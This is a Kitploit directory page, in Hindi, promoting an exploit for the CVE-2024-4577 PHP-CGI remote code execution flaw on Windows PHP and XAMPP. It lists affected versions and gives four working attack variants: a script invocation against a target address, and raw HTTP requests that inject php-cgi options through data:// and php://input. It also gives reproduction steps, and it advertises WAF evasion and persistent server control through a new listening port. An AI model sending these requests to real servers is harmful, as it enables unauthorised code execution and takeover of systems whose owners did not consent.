Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577-PHP-RCE — विंडोज़ पर CVE-2024-4577 PHP-CGI RCE के लिए एक्सप्लॉइट, WAF बाईपास और SSRF समर्थन के साथ। डिफ़ॉल्ट, WAF और SSRF परिदृश्यों के लिए कई एक्सप्लॉइट वेरिएंट प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

विंडोज़ पर CVE-2024-4577 PHP-CGI RCE के लिए एक्सप्लॉइट, WAF बाईपास और SSRF समर्थन के साथ। डिफ़ॉल्ट, WAF और SSRF परिदृश्यों के लिए कई एक्सप्लॉइट वेरिएंट प्रदान करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
652 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2024-4577-PHP-RCE

परियोजना परिचय और सिद्धांत

  • पहला वैश्विक EXP जो PHP डिफ़ॉल्ट वातावरण (XAMPP) के CVE-2024-4577 PHP-CGI RCE भेद्यता का उपयोग करता है।
  • दुनिया का पहला CVE-2024-4577 PHP-CGI RCE शोषण जो डिफ़ॉल्ट PHP वातावरण का उपयोग करता है। मूल शोषण साझा करना, SSRF का समर्थन करता है, WAF बाईपास का समर्थन करता है।
  • PHP डिफ़ॉल्ट वातावरण RCE को लागू करता है। सिद्धांत: cgi.force_redirect + REDIRECT-STATUS।
  • नया मूल EXP जो WAF बाईपास परिदृश्य का समर्थन करता है। सिद्धांत: FastCGI सर्वर स्थापित करें + FastCGI प्रोटोकॉल संचार।
  • नया मूल EXP जो SSRF परिदृश्य का समर्थन करता है। सिद्धांत: data:// प्रोटोकॉल + GET अनुरोध।

EXP 1 के लाभ

  • allow_url_include, auto_prepend_file, auto_append_file की आवश्यकता के बिना RCE। किसी भी फाइल और php फाइल को शामिल किया जा सकता है।
  • WAF द्वारा अक्सर अवरुद्ध किए जाने वाले कीवर्ड allow_url_include, auto_prepend_file, auto_append_file का उपयोग नहीं होता।
  • FastCGI सर्वर का सभी संचार WAF द्वारा रिकॉर्ड नहीं किया जाएगा।
  • नए पोर्ट पर सुनना, इस प्रकार PHP सर्वर पर स्थायी नियंत्रण प्राप्त करना, Apache और PHP से स्वतंत्र।

भेद्यता परिचय

जानकारीसामग्री
भेद्यता का नामPHP RCE
भेद्यता संख्याCVE-2024-4577
जोखिम स्तरउच्च जोखिम
भेद्यता प्रकारRCE
उपयोग की कठिनाईकम

प्रभावित संस्करण

  • PHP Windows संस्करण 8.3.0 <= प्रभावित संस्करण < 8.3.8
  • PHP Windows संस्करण 8.2.0 <= प्रभावित संस्करण < 8.2.20
  • PHP Windows संस्करण 8.1.0 <= प्रभावित संस्करण < 8.1.29
  • PHP Windows संस्करण प्रभावित संस्करण == 8.0.x
  • PHP Windows संस्करण प्रभावित संस्करण == 7.x
  • PHP Windows संस्करण प्रभावित संस्करण == 5.x
  • XAMPP Windows संस्करण 8.2.0 <= प्रभावित संस्करण <= 8.2.12
  • XAMPP Windows संस्करण 8.1.0 <= प्रभावित संस्करण <= 8.1.25
  • XAMPP Windows संस्करण प्रभावित संस्करण == 8.0.x
  • XAMPP Windows संस्करण प्रभावित संस्करण == 7.x
  • XAMPP Windows संस्करण प्रभावित संस्करण == 5.x

EXP 1

WAF बाईपास परिदृश्य + डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

उदाहरण:

python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

SSRF परिदृश्य + डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

डिफ़ॉल्ट परिदृश्य में उपयोग किया जा सकता है:

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

पुनरुत्पादन

  1. सर्वर वातावरण:
XAMPP Windows版 8.2.12
  1. सर्वर डाउनलोड करें और XAMPP स्थापित करें:
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

या यहाँ से प्रभावित संस्करण चुनें: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
  1. सर्वर कॉन्फ़िगरेशन:
कोई भी संशोधन न करें, डिफ़ॉल्ट कॉन्फ़िगरेशन रखें
  1. क्लाइंट द्वारा EXP का उपयोग:
उपरोक्त EXP का उपयोग करके परीक्षण करें
  1. सत्यापन:
जांचें कि क्या स्ट्रिंग "TesT" या सर्वर की system.ini फ़ाइल की सामग्री वापस आती है
टूल डाउनलोड करें